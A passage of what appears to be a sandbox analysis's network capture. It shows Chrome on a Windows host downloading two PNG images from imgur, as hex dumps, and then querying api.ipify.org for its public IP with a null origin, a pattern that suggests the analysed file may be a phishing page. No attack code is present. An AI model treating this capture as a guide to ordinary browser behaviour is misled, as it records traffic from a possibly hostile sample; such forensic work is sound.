:6/_g?2+Dk~h0.q]wu!\|l[n]Wg!3g>(TmaX(W_<y^O]Y(5ziJX5\CC(W_QUGt'EqCm*XU9rZ8pPKBz\|]w=Y9a%l\|P?
2025-03-17 21:35:03 UTC	1371	IN	Data Raw: d0 a0 81 03 07 d2 f3 f0 e5 83 d0 80 ea 1b 28 81 bf 56 de 2a fa 8d 25 24 24 b4 6d db 56 97 01 82 86 8a cf e7 a3 1b 7d 90 f7 65 3a 8c f6 71 c3 3f 3a 10 5e c8 97 bf 7f ff fe b8 b8 38 ca c2 a3 1a ba e4 cb b7 5a ad 54 e6 ab 26 e8 56 c3 56 f9 83 06 0d 1a 3e 7c 38 7b 95 f9 f2 65 59 46 f3 5c 10 3c b8 b3 18 dc 6e 37 f5 d9 a3 1b 6e c0 58 19 a5 ee 1b 0c 86 e1 c3 87 23 b0 06 b4 d9 bb 77 2f b3 60 49 92 a4 a1 e5 14 ec 95 24 89 dc 59 8d 1b 37 d6 77 a4 a1 a0 2d 5a 31 0e f5 cb df bf 7f bf c3 e1 20 c9 af b6 5f 3e 05 17 ab 9d ea c5 c5 c5 91 ea b7 6f df fe bd f7 de 53 4b 3e 03 fd f2 41 6d c1 5a df 70 e8 d0 21 8a b6 a9 db ea 68 37 e0 a1 fb 78 46 46 06 02 6b 40 9b 9c 9c 1c 75 8a b5 46 e5 47 36 83 54 14 25 35 35 55 c7 31 d6 1a 3a 05 ab d5 4a b9 e8 f9 f9 f9 a7 4f 9f 3e 7e fc b8 Data Ascii: (V*%$$mV}e:q?:^8ZT&VV>\|8{eYF\<n7nX#w/`I$Y7w-Z1 _>oSK>AmZp!h7xFFk@uFG6T%55U1:JO>~
2025-03-17 21:35:03 UTC	1371	IN	Data Raw: fa 6a ba ef 87 61 74 b5 a3 ea 52 9e 54 9f e7 79 a3 d1 58 ab 8e c0 91 70 3a 75 88 20 08 6b d7 ae 7d e6 99 67 76 ef de 5d c9 97 af fd 46 b5 2f 9f 24 5f 51 94 aa be 7c 48 3e 08 2b 31 ad fa 05 05 05 da 5b 71 d5 92 96 96 96 98 98 18 9e 11 81 06 cc f6 ed db 47 8d 1a f5 d3 4f 3f 71 1c 17 da ea f6 96 5b 6e c9 cc cc 0c c3 d0 ea 0c 2a bb 4b 45 87 aa 0d 59 57 4b 30 db ff 0d 08 f8 f2 41 83 26 a6 27 95 05 05 05 21 dc 8f d0 5d 17 54 65 d7 ae 5d 2f bf fc f2 f7 df 7f 4f 2d 98 43 88 21 b5 6e dd fa 9e 7b ee 21 d9 88 cc d5 5e a5 08 7f 90 92 1f 4d 84 a3 5f fe 5d 77 dd 45 cf c3 97 0f f4 21 76 af 2d 49 92 42 b8 35 1b 0c 86 66 cd 9a 85 61 38 a0 01 93 97 97 37 65 ca 94 65 cb 96 51 f0 b6 a4 a4 24 84 e2 f3 dd ba 75 23 47 a8 76 ad fe fa 85 75 ac a8 94 8b ae 31 4d 89 26 cf 1e 7c f9 Data Ascii: jatRTyXp:u k}gv]F/$_Q\|H>+1[qGO?q[n*KEYWK0A&'!]Te]/O-C!n{!^M_]wE!v-IB5fa87eeQ$u#Gvu1M&\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.24	60838	199.232.192.193	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:35:04 UTC	386	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:35:04 UTC	759	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Mon, 17 Mar 2025 21:35:04 GMT Age: 1950361 X-Served-By: cache-iad-kcgs7200129-IAD, cache-ewr-kewr1740076-EWR X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 3, 1 X-Timer: S1742247304.461801,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-17 21:35:04 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-03-17 21:35:04 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-03-17 21:35:04 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
2025-03-17 21:35:04 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-03-17 21:35:04 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.24	60841	199.232.192.193	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:35:04 UTC	386	OUT	GET /KAb5SEy.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:35:04 UTC	760	IN	HTTP/1.1 200 OK Connection: close Content-Length: 48869 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 13:35:05 GMT ETag: "8aa14660517f5460156fccc2199cf83c" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: ZMDtIIYNSizYrfDVWXb5ZuJtkSbNLszxoUAHUCL9zZz9IlMMufkJOg== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Mon, 17 Mar 2025 21:35:04 GMT Age: 1999377 X-Served-By: cache-iad-kjyo7100129-IAD, cache-ewr-kewr1740061-EWR X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 4, 1 X-Timer: S1742247305.500605,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-17 21:35:04 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a7 00 00 02 3e 08 02 00 00 00 0e ee 34 d8 00 00 80 00 49 44 41 54 78 9c ec bd 77 7c 14 e5 da ff bf b3 b3 7d 37 3d 10 0c 3d 94 50 42 11 54 10 8f 22 d6 a3 1e 45 e4 b1 60 45 54 1e 11 45 ba 22 52 45 a4 89 05 eb 51 44 fd 3e 3e a8 14 c1 47 39 08 7a 10 14 50 94 5e 12 6a 28 21 04 48 48 48 d9 36 ed f7 3a 5c fe 6e c7 94 d9 cd 92 9d 6c 76 3f ef 3f 7c 6d 76 67 97 7b dc d9 f9 dc f7 75 5f 9f eb 32 29 8a 62 00 00 00 00 40 0c 60 ac ef 01 00 00 00 00 40 27 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 01 aa 0f 00 00 00 c4 0a 50 7d 00 00 00 20 56 80 ea 03 00 00 00 b1 02 54 1f 00 00 00 88 15 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 Data Ascii: PNGIHDR>4IDATxw\|}7==PBT"E`ETE"REQD>>G9zP^j(!HHH6:\nlv??\|mvg{u_2)b@`@'@b>+@XP} VT@b>+@X
2025-03-17 21:35:04 UTC	1371	IN	Data Raw: 95 de 05 00 00 20 34 f8 a9 53 a7 d6 f7 18 40 1d 50 a9 2c 2e 7b 92 64 d8 ef f7 7f f0 c1 07 6f bf fd f6 91 23 47 2e fe df a2 cf ac a9 05 1f 1d 40 35 79 68 f6 c0 f3 bc c5 62 a9 6d 96 80 d9 6c 16 45 f1 d4 a9 53 1e 8f 27 23 23 23 35 35 d5 68 34 92 2b e1 e2 4f 01 00 00 62 13 44 f8 1b 3c b4 94 67 02 4c 79 fb a4 8e 24 90 a2 28 2e 58 b0 60 ee dc b9 a7 4e 9d ba 98 7f a8 da 9d 7e b5 47 40 7d 24 2b d3 1b f2 05 46 19 00 b4 0b f0 d8 63 8f 8d 1f 3f 1e 8e 3e 00 00 b8 48 a0 fa 51 8e db ed 9e 33 67 ce 82 05 0b ce 9d 3b 47 4b f0 da c6 c9 d5 95 74 6b 82 2d fd 69 7b be ea 4b 3c cf 57 7a 3e 18 58 8e a1 cd 66 7b e0 81 07 46 8e 1c 99 95 95 55 db 0f 01 00 00 c0 40 84 3f 4a 10 04 81 a5 eb b3 75 7f 41 41 c1 dc b9 73 17 2c 58 50 52 52 62 32 99 ec 76 bb cf e7 ab ed 27 b3 d5 3c fd 49 Data Ascii: 4S@P,.{do#G.@5yhbmlES'###55h4+ObD<gLy$(.X`N~G@}$+Fc?>HQ3g;GKtk-i{K<Wz>Xf{FU@?JuAAs,XPRRb2v'<I
2025-03-17 21:35:04 UTC	1371	IN	Data Raw: 15 15 15 4c ec 03 a6 22 32 1f 3f 1d 4c 66 01 83 c1 30 7a f4 e8 f1 e3 c7 a7 a5 a5 85 6f c0 00 00 d0 a0 81 ea 47 1c 14 ee 0e 78 d8 a2 45 8b c6 8c 19 53 5c 5c 1c c2 3f c1 8a dd 5a ad 56 9f cf c7 71 5c db b6 6d 37 6e dc 18 17 17 67 b3 d9 2a 25 de 87 1b 51 14 1f 79 e4 91 ff fd df ff 25 39 3f 7f fe 7c b5 c2 1f 8c 8f df 6c 36 0f 1c 38 70 da b4 69 e4 33 84 9d 0f 00 00 2a 81 08 7f c4 11 8c dc 2e 5c b8 70 fa f4 e9 05 05 05 54 0a b7 b6 9f 4f 85 71 52 52 52 68 b9 7c e7 9d 77 fe f3 9f ff 6c d2 a4 09 49 be 7a 27 5e dd cb 27 4c 18 8d c6 56 ad 5a 71 1c 97 9d 9d 5d 5e 5e 6e b5 5a 5d 2e 97 db ed b6 58 2c ea 7f 9d 02 fb 26 93 a9 a6 3a 04 e4 e3 3f 79 f2 a4 ba 1f 3f 6b 4a 04 00 00 00 aa df 90 20 09 14 45 f1 bd f7 de 9b 3c 79 72 7e 7e be d9 6c 0e c1 94 4f da 69 b3 d9 4a 4b 4b Data Ascii: L"2?Lf0zoGxES\\?ZVq\m7ng%Qy%9?\|l68pi3.\pTOqRRRh\|wlIz'^'LVZq]^^nZ].X,&:?y?kJ E<yr~~lOiJKK
2025-03-17 21:35:04 UTC	1371	IN	Data Raw: ab 55 c7 53 a9 4b a8 83 0e f9 f8 3d 1e cf d1 a3 47 7d 3e 1f 2d f4 59 25 c1 9a 36 f5 69 cb 9f 22 25 54 9e 48 14 45 af d7 0b 1f 3f 00 20 36 81 73 2f 52 c8 cb cb 9b 32 65 ca 47 1f 7d 44 5e 3b e1 02 06 83 21 2e 2e 4e 14 45 ed 7d 7d 52 7d 52 3e 2a 64 6b 36 9b 37 6e dc d8 b5 6b 57 1d cf 40 0f 3c 1e cf 8d 37 de b8 7d fb 76 b7 db cd f3 3c c9 79 40 1f bf c3 e1 50 14 85 fe 1f da 6c 36 56 d9 10 3e 7e 00 40 ac d1 90 12 bb 1a 28 1a cb 50 b6 7c cf ce ce 1e 39 72 e4 a2 45 8b e8 4f b7 db cd 5e 2a 2b 2b 23 b9 aa 94 9f cf 48 48 48 20 f7 5a 7c 7c 3c 6d ed f7 ee dd fb b7 df 7e 8b 3e c9 a7 3a 45 1b 36 6c e8 df bf 3f ed 59 24 24 24 50 be 82 c5 62 a9 94 a5 68 34 1a d9 8e 86 db ed 66 d3 26 af d7 cb be 91 05 0b 16 8c 1e 3d fa d0 a1 43 f4 67 08 e5 8d 01 00 a0 61 81 08 7f d8 d1 b0 Data Ascii: USK=G}>-Y%6i"%THE? 6s/R2eG}D^;!..NE}}R}R>dk67nkW@<7}v<y@Pl6V>~@(P\|9rEO^++#HHH Z\|\|<m~>:E6l?Y$$$Pbh4f&=Cga
2025-03-17 21:35:04 UTC	1371	IN	Data Raw: de 7d fb f6 29 8a 02 1f 3f 00 a0 a1 03 bf 7e 18 f9 f5 d7 5f 6f bf fd f6 b3 67 cf 5a 2c 16 5a af d3 da 5d 92 24 9b cd a6 b1 bb cf 1c e7 f4 20 21 21 a1 57 af 5e 2b 57 ae b4 d9 6c fa 9e 41 83 27 64 1f bf 24 49 34 45 a3 5a fd 34 f7 1a 37 6e dc d8 b1 63 d5 7b fc 55 d3 36 01 00 20 92 81 25 a9 8e 61 8b f8 8d 1b 37 0e 1b 36 ec ec d9 b3 a4 3d 34 bb 12 45 91 84 87 49 3e 2b a7 4f e9 7b 1c c7 31 3b 7e 42 42 02 3d b8 f3 ce 3b 21 f9 a1 51 93 8f 9f 59 f6 09 da 55 61 fa 5d 5e 5e ce ea 28 78 3c 1e f6 9d be f6 da 6b 23 47 8e 3c 72 e4 08 fd 29 08 02 24 1f 00 d0 b0 40 84 bf 2e 51 14 85 dc f6 bb 76 ed 9a 31 63 c6 fa f5 eb 2d 16 8b 76 8d 17 16 6b 61 f6 3c 2a ba 27 cb b2 c7 e3 31 9b cd 4f 3e f9 e4 c8 91 23 11 58 0e 19 f2 f1 cb b2 bc 77 ef 5e b7 db 6d b7 db 5d 2e 97 db ed 66 33 Data Ascii: })?~_ogZ,Z]$ !!W^+WlA'd$I4EZ47nc{U6 %a76=4EI>+O{1;~BB=;!QYUa]^^(x<k#G<r)$@.Qv1c-vka<*'1O>#Xw^m].f3
2025-03-17 21:35:04 UTC	1371	IN	Data Raw: 7e f8 e1 a1 87 1e ca cb cb a3 4b ba ac ac 4c 96 65 9e e7 99 c3 48 92 24 9f cf 47 9e 94 a2 a2 a2 23 47 8e dc 73 cf 3d f5 3d 70 10 5e a0 fa a1 40 92 ff eb af bf 4e 99 32 e5 f0 e1 c3 d4 2f a7 b6 6e 08 12 92 c7 1e 7b 6c c6 8c 19 b4 59 00 c9 d7 19 b5 8f bf 7b f7 ee 65 65 65 db b7 6f af ad 8f df 64 32 09 82 a0 f6 f1 53 3f 7e f8 f8 41 fd b2 7c f9 f2 91 23 47 16 14 14 50 6b 69 ba e1 a8 a7 b0 74 db 61 7d a4 14 45 39 78 f0 e0 ed b7 df de a4 49 93 7a 1d 38 08 2f 50 fd 5a 43 e1 fd a2 a2 a2 59 b3 66 ad 5e bd 3a 98 ce ad d5 62 b1 58 ee bd f7 de 09 13 26 20 1a 5c bf d0 8e 7e 72 72 72 68 3e 7e 93 c9 44 0d 96 d4 3e fe 9c 9c 1c ea c7 0f 1f 3f d0 1f bf df bf 6c d9 b2 b9 73 e7 ee dd bb 97 d5 0e b1 58 2c 0e 87 83 1e 3b 9d 4e 8a 35 92 9f 85 2e 60 45 51 44 51 6c d4 a8 51 bf 7e Data Ascii: ~KLeH$G#Gs==p^@N2/n{lY{eeeod2S?~A\|#GPkita}E9xIz8/PZCYf^:bX& \~rrrh>~D>?lsX,;N5.`EQDQlQ~
2025-03-17 21:35:04 UTC	1371	IN	Data Raw: 6a fd e6 9b 6f d8 ce 3d 68 88 f8 fd 7e 56 a2 3c 21 21 81 1e b0 0a 3f 44 25 1f bf 06 c3 86 0d a3 8f ad a8 a8 a8 ef 33 03 0d 92 a5 4b 97 a6 a7 a7 53 05 1e 8d 2b 8d 5d a2 64 3d 65 8f 0d 06 43 62 62 22 bd da ae 5d bb e5 cb 97 d7 f7 09 01 9d 40 84 3f 00 54 63 67 e5 ca 95 9f 7f fe 39 f9 f4 6a 82 b5 cd 65 6d 2d 98 cb 6b e4 c8 91 0f 3f fc b0 d5 6a 85 71 ab e1 c2 f3 7c cb 96 2d 65 59 56 f7 e3 77 bb dd b5 ed c7 4f 1c 3b 76 4c 92 a4 bf fd ed 6f b4 4f 84 fd 1d 50 2b 96 2e 5d 3a 6d da b4 c3 87 0f 07 ac f3 a1 76 99 b2 c7 1c c7 c5 c7 c7 9f 3f 7f 5e 96 e5 ac ac ac d1 a3 47 df 7d f7 dd b8 08 63 85 fa 9e 76 44 34 1e 8f 47 51 94 bc bc bc 9b 6f be 99 fe 77 69 af f5 69 e2 4c 3d 57 d8 cc ba 53 a7 4e c7 8e 1d ab ef 53 01 75 c3 a1 43 87 fe eb bf fe 8b be 6e 5a 63 31 81 57 5f 1b Data Ascii: jo=h~V<!!?D%3KS+]d=eCbb"]@?Tcg9jem-k?jq\|-eYVwO;vLoOP+.]:mv?^G}cvD4GQowiiL=WSNSuCnZc1W_
2025-03-17 21:35:04 UTC	1371	IN	Data Raw: be 42 20 a1 3a 36 81 2f 1f 84 15 a8 fe 5f a0 9b f5 d9 b3 67 3f f9 e4 13 ba e7 32 87 2b 9b 44 6b 7f c2 ed b7 df 7e fd f5 d7 ab df 08 a2 1e ea 9a 68 30 18 2e bd f4 d2 71 e3 c6 5d 77 dd 75 21 7c 88 d9 6c ce cb cb 5b b7 6e 5d 18 06 08 1a 12 a1 f5 cb 57 d7 d8 67 21 81 b4 b4 b4 99 33 67 3e f8 e0 83 f4 a7 28 8a 54 6d 0c 61 a4 58 06 aa ff 17 28 b8 fa d5 57 5f 9d 3c 79 92 04 5e dd 4f 5d bb 59 b5 28 8a 8d 1a 35 7a f0 c1 07 69 4a ae ee a3 0f a2 1b 8e e3 58 06 f5 35 d7 5c f3 d0 43 0f a5 a4 a4 d4 f6 43 28 ee fa d5 57 5f 51 55 47 10 83 c0 97 0f 74 00 aa ff 27 14 d2 17 45 71 e5 ca 95 ec c7 43 6d 2a 58 b1 55 ed 39 72 87 0e 1d ae bd f6 5a 0a a3 e9 38 70 50 9f b0 4b 42 10 04 7a 7c d7 5d 77 3d fc f0 c3 b5 fd 1c 59 96 39 8e db b0 61 03 25 6c 83 18 04 be 7c a0 03 50 fd 3f a1 Data Ascii: B :6/_g?2+Dk~h0.q]wu!\|l[n]Wg!3g>(TmaX(W_<y^O]Y(5ziJX5\CC(W_QUGt'EqCm*XU9rZ8pPKBz\|]w=Y9a%l\|P?
2025-03-17 21:35:04 UTC	1371	IN	Data Raw: d0 a0 81 03 07 d2 f3 f0 e5 83 d0 80 ea 1b 28 81 bf 56 de 2a fa 8d 25 24 24 b4 6d db 56 97 01 82 86 8a cf e7 a3 1b 7d 90 f7 65 3a 8c f6 71 c3 3f 3a 10 5e c8 97 bf 7f ff fe b8 b8 38 ca c2 a3 1a ba e4 cb b7 5a ad 54 e6 ab 26 e8 56 c3 56 f9 83 06 0d 1a 3e 7c 38 7b 95 f9 f2 65 59 46 f3 5c 10 3c b8 b3 18 dc 6e 37 f5 d9 a3 1b 6e c0 58 19 a5 ee 1b 0c 86 e1 c3 87 23 b0 06 b4 d9 bb 77 2f b3 60 49 92 a4 a1 e5 14 ec 95 24 89 dc 59 8d 1b 37 d6 77 a4 a1 a0 2d 5a 31 0e f5 cb df bf 7f bf c3 e1 20 c9 af b6 5f 3e 05 17 ab 9d ea c5 c5 c5 91 ea b7 6f df fe bd f7 de 53 4b 3e 03 fd f2 41 6d c1 5a df 70 e8 d0 21 8a b6 a9 db ea 68 37 e0 a1 fb 78 46 46 06 02 6b 40 9b 9c 9c 1c 75 8a b5 46 e5 47 36 83 54 14 25 35 35 55 c7 31 d6 1a 3a 05 ab d5 4a b9 e8 f9 f9 f9 a7 4f 9f 3e 7e fc b8 Data Ascii: (V*%$$mV}e:q?:^8ZT&VV>\|8{eYF\<n7nX#w/`I$Y7w-Z1 _>oSK>AmZp!h7xFFk@uFG6T%55U1:JO>~
2025-03-17 21:35:04 UTC	1371	IN	Data Raw: fa 6a ba ef 87 61 74 b5 a3 ea 52 9e 54 9f e7 79 a3 d1 58 ab 8e c0 91 70 3a 75 88 20 08 6b d7 ae 7d e6 99 67 76 ef de 5d c9 97 af fd 46 b5 2f 9f 24 5f 51 94 aa be 7c 48 3e 08 2b 31 ad fa 05 05 05 da 5b 71 d5 92 96 96 96 98 98 18 9e 11 81 06 cc f6 ed db 47 8d 1a f5 d3 4f 3f 71 1c 17 da ea f6 96 5b 6e c9 cc cc 0c c3 d0 ea 0c 2a bb 4b 45 87 aa 0d 59 57 4b 30 db ff 0d 08 f8 f2 41 83 26 a6 27 95 05 05 05 21 dc 8f d0 5d 17 54 65 d7 ae 5d 2f bf fc f2 f7 df 7f 4f 2d 98 43 88 21 b5 6e dd fa 9e 7b ee 21 d9 88 cc d5 5e a5 08 7f 90 92 1f 4d 84 a3 5f fe 5d 77 dd 45 cf c3 97 0f f4 21 76 af 2d 49 92 42 b8 35 1b 0c 86 66 cd 9a 85 61 38 a0 01 93 97 97 37 65 ca 94 65 cb 96 51 f0 b6 a4 a4 24 84 e2 f3 dd ba 75 23 47 a8 76 ad fe fa 85 75 ac a8 94 8b ae 31 4d 89 26 cf 1e 7c f9 Data Ascii: jatRTyXp:u k}gv]F/$_Q\|H>+1[qGO?q[n*KEYWK0A&'!]Te]/O-C!n{!^M_]wE!v-IB5fa87eeQ$u#Gvu1M&\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.24	60843	104.26.13.205	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 21:35:08 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-17 21:35:08 UTC	463	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 21:35:08 GMT Content-Type: application/json Content-Length: 21 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 921f9e4f3f157d18-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2078&min_rtt=2043&rtt_var=836&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1121&delivery_rate=1255913&cwnd=194&unsent_bytes=0&cid=14aa98dceb9a22b1&ts=168&x=0"
2025-03-17 21:35:08 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"ip":"8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.24	60844	104.26.13.205	443	5628	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
